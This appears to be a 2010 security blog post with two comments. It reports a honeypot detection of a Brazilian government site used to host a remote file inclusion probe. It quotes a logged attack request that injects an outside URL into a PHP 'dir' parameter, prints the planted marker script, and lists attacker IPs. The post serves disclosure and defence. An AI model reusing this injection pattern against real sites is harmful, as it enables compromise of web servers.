Today our honeypot detected one more .gov site hacked (among the thousands we see daily). This time from the Brazilian government. The site in question is http://www.sefaz.mt.gov.br.
We started to see RFI requests trying to use a file placed inside their “portal” directory:
a.185.231.103 - - -
"GET /bbs//write.php?dir=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 36 "-" "Mozilla/5.0"
After examining it we can see again traces of the famous RFI bot scanner:
$ lynx --source --dump http://www.sefaz.mt.gov.br/portal/tes.txt
< ?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
Anyone with contacts on the mt.gov.br? Let them know about it.. We only detected this file, but if the attackers were able to add this one, they probably added (or will add) a bunch more.
2 comments
Hi guys,
Confirmed through our honey net.
RFI IP : 201.49.164.104
RFI FQDN : 201.49.164.104
RFI Country : – Brazil
RFI City : N/A
RFI ID : 4506
RFI Domain : http://www.sefaz.mt.gov.br
RFI Domain IP : 200.241.32.194
RFI URL : http://www.sefaz.mt.gov.br/portal/tes.txt??
RFI number of events : 2
RFI total SRC IP : 1
RFI first seen : 2010-04-08 16:58:24
RFI last seen : 2010-04-08 17:14:38
RFI livetime : 0 day('s)
Source(s) requesting this RFI :
SIP :89.185.231.103
Numbers of events generated by this SIP : 150
SIP first seen : 2009-07-24 03:34:41
SIP last seen : 2010-04-08 17:14:38
SIP also hosting RFI exploit : YES
Events activities from this SIP : http://twitpic.com/1e3vup
SIP as RFI details : http://twitpic.com/1e3w2x
hi
actually 52 items active with .gov domains…
http://support.clean-mx.de/clean-mx/viruses.php?sort=id%20desc&response;=alive&limit;=0,100&domain;=%.gov%
— Gerhard
Comments are closed.